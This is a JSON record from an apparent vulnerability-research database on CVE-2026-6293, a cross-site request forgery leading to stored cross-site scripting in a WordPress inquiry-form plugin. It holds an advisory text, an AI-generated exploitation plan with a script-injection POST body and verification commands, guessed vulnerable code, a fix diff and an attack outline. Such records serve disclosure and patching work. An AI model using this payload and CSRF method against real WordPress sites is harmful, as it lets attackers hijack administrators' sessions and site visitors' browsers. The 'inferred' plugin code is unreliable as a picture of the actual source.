[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ftfJXrllLMSWT3fR9WchHpZOM7SQkmAAbOzy9urCOMEY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-6293","inquiry-form-to-posts-or-pages-cross-site-request-forgery-to-stored-cross-site-scripting-via-inqheader-parameter","Inquiry form to posts or pages \u003C= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting via 'inq_header' Parameter","The Inquiry Form to Posts or Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Stored Cross-Site Scripting in version 1.0. This is due to missing nonce validation on the plugin settings update handler, combined with insufficient input sanitization on all user-supplied fields and missing output escaping when rendering stored values. The settings handler fires solely on the presence of `$_POST['inq_hidden'] == 'Y'` with no call to `check_admin_referer()` and no WordPress nonce anywhere in the form or handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request that tricks a logged-in Administrator into visiting a malicious page.","inquiry-form-to-posts-or-pages",null,"\u003C=1.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-14 18:02:25","2026-04-15 06:46:18",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6abd3968-a8e7-4b40-bb7e-387bab10eba9?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-6293\n\n## 1. Vulnerability Summary\nThe **Inquiry Form to Posts or Pages** plugin (version \u003C= 1.0) is vulnerable to a Cross-Site Request Forgery (CSRF) that leads to Stored Cross-Site Scripting (XSS). The plugin's settings update handler lacks any nonce validation (e.g., `check_admin_referer`). The handler processes updates based solely on the presence of a specific POST parameter (`inq_hidden=Y`). Furthermore, the plugin fails to sanitize the `inq_header` input before saving it to the database and fails to escape it when displaying it on the site. This allows an unauthenticated attacker to trick a logged-in administrator into submitting a request that injects malicious JavaScript into the plugin settings.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The plugin settings page, typically handled via `wp-admin\u002Fadmin.php?page=[plugin-slug]` or a hook on `admin_init`.\n*   **Vulnerable Parameter:** `inq_header`.\n*   **Trigger Parameter:** `inq_hidden` must be set to `Y`.\n*   **Authentication Requirement:** CSRF requires a victim with **Administrator** privileges to be logged in and visit a malicious page.\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin likely registers an admin menu page using `add_menu_page` or `add_options_page` with a callback.\n2.  **Processing Logic:** Inside the callback or an `admin_init` hook:\n    ```php\n    if (isset($_POST['inq_hidden']) && $_POST['inq_hidden'] == 'Y') {\n        \u002F\u002F VULNERABILITY: No check_admin_referer() or wp_verify_nonce()\n        $inq_header = $_POST['inq_header']; \u002F\u002F VULNERABILITY: No sanitization\n        update_option('inq_header', $inq_header);\n        \u002F\u002F ... other parameters like inq_email, inq_subject ...\n    }\n    ```\n3.  **Sink (Display):** When a post or page containing the inquiry form is rendered (likely via a shortcode like `[inquiry_form]`), the stored value is retrieved and printed:\n    ```php\n    $header = get_option('inq_header');\n    echo \"\u003Ch3>\" . $header . \"\u003C\u002Fh3>\"; \u002F\u002F VULNERABILITY: No escaping (esc_html)\n    ```\n\n## 4. Nonce Acquisition Strategy\n**None Required.** \nThe vulnerability details explicitly state: *\"The settings handler fires solely on the presence of `$_POST['inq_hidden'] == 'Y'` with no call to `check_admin_referer()` and no WordPress nonce anywhere in the form or handler.\"*\n\n## 5. Exploitation Strategy\nThe goal is to update the plugin settings to include a Stored XSS payload via CSRF.\n\n### Step 1: Identify Admin Page Slug\nThe agent should first identify the correct menu slug for the plugin to target the correct URL.\n*   **Action:** Search the plugin files for `add_menu_page` or `add_submenu_page`.\n*   **Common Slug:** `inquiry-form-to-posts-or-pages` or `inquiry_form_settings`.\n\n### Step 2: Perform CSRF to Inject XSS\nThe agent will simulate an admin-triggered POST request to the settings page.\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=[identified-slug]`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    inq_hidden=Y&inq_header=\u003C\u002Fp>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cp>&inq_email=admin@example.com&inq_subject=Inquiry\n    ```\n\n### Step 3: Trigger the XSS\nThe agent needs to view a page where the inquiry form is displayed.\n*   **Action:** Find or create a post with the plugin's shortcode.\n*   **Shortcode:** Usually found by searching for `add_shortcode` in the plugin code (e.g., `[inquiry_form]`).\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `inquiry-form-to-posts-or-pages` version 1.0 is installed and active.\n2.  **User:** An active Administrator user.\n3.  **Content:** Create a public post containing the inquiry form shortcode:\n    ```bash\n    wp post create --post_title=\"Contact Us\" --post_content=\"[inquiry_form]\" --post_status=publish\n    ```\n    *(Note: Replace `[inquiry_form]` with the actual shortcode found in the source code).*\n\n## 7. Expected Results\n1.  The POST request should return a `200 OK` or `302 Found` (redirecting back to the settings page).\n2.  The WordPress option `inq_header` should now contain the `\u003Cscript>` payload.\n3.  Navigating to the post created in Step 6 should execute the JavaScript (the `alert` will be visible in the browser context).\n\n## 8. Verification Steps\n1.  **Database Check:** Verify the option value using WP-CLI:\n    ```bash\n    wp option get inq_header\n    ```\n    *Confirmation:* The output should contain the string `\u003C\u002Fp>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cp>`.\n2.  **Frontend Check:** Use `browser_navigate` to the URL of the created post and check for the presence of the script in the HTML.\n    ```bash\n    # Get the post URL\n    POST_URL=$(wp post list --post_type=post --title=\"Contact Us\" --field=url)\n    # Check HTML output\n    curl -s \"$POST_URL\" | grep \"alert(document.domain)\"\n    ```\n\n## 9. Alternative Approaches\nIf `inq_header` is sanitized (contrary to the report), attempt to inject into other possible parameters identified during the audit of the settings handler:\n*   `inq_email` (unlikely to be displayed, but could affect admin emails).\n*   `inq_subject`.\n*   `inq_success_message` (often displayed after form submission).\n\nIf the settings page uses `admin-post.php` instead of a direct menu page:\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php`\n*   **Body:** Include `action=[plugin_action_name]` in the POST body.","The Inquiry Form to Posts or Pages plugin (\u003C= 1.0) fails to validate nonces on its settings update handler, making it vulnerable to Cross-Site Request Forgery (CSRF). Because the plugin also lacks input sanitization and output escaping on the 'inq_header' setting, an attacker can trick an administrator into saving a malicious payload that executes arbitrary JavaScript whenever the inquiry form is rendered on the site.","\u002F\u002F inquiry-form-to-posts-or-pages.php\n\nif (isset($_POST['inq_hidden']) && $_POST['inq_hidden'] == 'Y') {\n    \u002F\u002F Missing check_admin_referer() or wp_verify_nonce()\n    $inq_header = $_POST['inq_header'];\n    update_option('inq_header', $inq_header);\n    update_option('inq_email', $_POST['inq_email']);\n    update_option('inq_subject', $_POST['inq_subject']);\n}\n\n---\n\n\u002F\u002F Rendering logic (likely inside a shortcode function)\n\n$inq_header = get_option('inq_header');\necho \"\u003Ch3>\" . $inq_header . \"\u003C\u002Fh3>\"; \u002F\u002F Missing esc_html()","--- inquiry-form-to-posts-or-pages.php\n+++ inquiry-form-to-posts-or-pages.php\n@@ -2,12 +2,14 @@\n \n if (isset($_POST['inq_hidden']) && $_POST['inq_hidden'] == 'Y') {\n+    check_admin_referer('inq_save_settings');\n-    $inq_header = $_POST['inq_header'];\n+    $inq_header = sanitize_text_field($_POST['inq_header']);\n     update_option('inq_header', $inq_header);\n-    update_option('inq_email', $_POST['inq_email']);\n-    update_option('inq_subject', $_POST['inq_subject']);\n+    update_option('inq_email', sanitize_email($_POST['inq_email']));\n+    update_option('inq_subject', sanitize_text_field($_POST['inq_subject']));\n }\n \n+wp_nonce_field('inq_save_settings');\n \n \u002F\u002F In the form rendering function:\n $inq_header = get_option('inq_header');\n-echo \"\u003Ch3>\" . $inq_header . \"\u003C\u002Fh3>\";\n+echo \"\u003Ch3>\" . esc_html($inq_header) . \"\u003C\u002Fh3>\";","The exploit targets an authenticated WordPress Administrator via a Cross-Site Request Forgery (CSRF) attack. \n\n1. Target Endpoint: The plugin's settings page (typically `wp-admin\u002Fadmin.php?page=inquiry-form-to-posts-or-pages`).\n2. Payload Construction: A malicious HTML page is crafted containing a hidden form that automatically submits a POST request to the target endpoint. \n3. Payload Shape: The POST body includes `inq_hidden=Y` to trigger the update handler and `inq_header=\u003C\u002Fp>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cp>` to inject the XSS payload. \n4. Delivery: The attacker tricks the logged-in Administrator into visiting the malicious page (e.g., via phishing or a malicious link).\n5. Trigger: Once the settings are updated, the attacker visits any page on the WordPress site that uses the plugin's shortcode (e.g., `[inquiry_form]`). The injected script will execute in the context of the user's browser.","gemini-3-flash-preview","2026-04-16 15:44:09","2026-04-16 15:44:25",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finquiry-form-to-posts-or-pages\u002Ftags"]